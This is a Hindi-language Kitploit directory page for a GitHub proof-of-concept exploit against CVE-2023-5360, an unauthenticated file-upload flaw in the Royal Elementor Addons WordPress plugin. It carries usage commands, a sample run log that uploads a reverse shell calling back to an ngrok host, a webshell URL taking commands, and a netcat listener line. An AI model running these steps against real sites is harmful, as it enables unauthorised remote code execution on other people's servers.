Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-5360 — Royal Elementor Addons - अप्रमाणित दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/x3rx3ssec/cve-2023-5360
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubx3rx3ssec/cve-2023-5360

CVE-2023-5360

Royal Elementor Addons - अप्रमाणित दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-5360 Elementor फ़ाइल अपलोड एक्सप्लॉइट

Royal Elementor Addons and Templates WordPress प्लगइन का 1.3.79 से पहले का संस्करण अपलोड की गई फ़ाइलों को सही ढंग से मान्य नहीं करता, जिससे अप्रमाणित उपयोगकर्ता PHP जैसी मनमानी फ़ाइलें अपलोड कर सकते हैं और RCE प्राप्त कर सकते हैं।

root@kitploit:~
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S

विवरण

यह CVE-2023-5360 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो WordPress के लिए Elementor Pro में एक फ़ाइल अपलोड भेद्यता है। यह एक अप्रमाणित हमलावर को मनमानी PHP फ़ाइलें अपलोड करने और रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है।

विशेषताएँ

  • स्वचालित रूप से Elementor nonce प्राप्त करें
  • एक साधारण वेबशेल या रिवर्स शेल अपलोड करें
  • चोरी के लिए अद्वितीय फ़ाइल नाम
  • वैकल्पिक Netcat लिसनर सहायक
  • बहुत ही शानदार

उपयोग

root@kitploit:~
python3 CVE-2023-5360.py <https://victim.site/>

उदाहरण:

root@kitploit:~
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣

पेलोड विकल्प:

  1. सरल कमांड वेबशेल (?cmd=id जैसे: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. रिवर्स शेल (Bash)

निर्भरताएँ

  • Python 3.x
  • requests मॉड्यूल

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests

उदाहरण लिसनर

root@kitploit:~
nc -lvnp 1337

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। आप इसके उपयोग के लिए स्वयं जिम्मेदार हैं। केवल उन सिस्टम पर परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की अनुमति आपके पास है।

क्रेडिट

लेखक: X3RX3S CVE-2023-5360

टूल डाउनलोड करें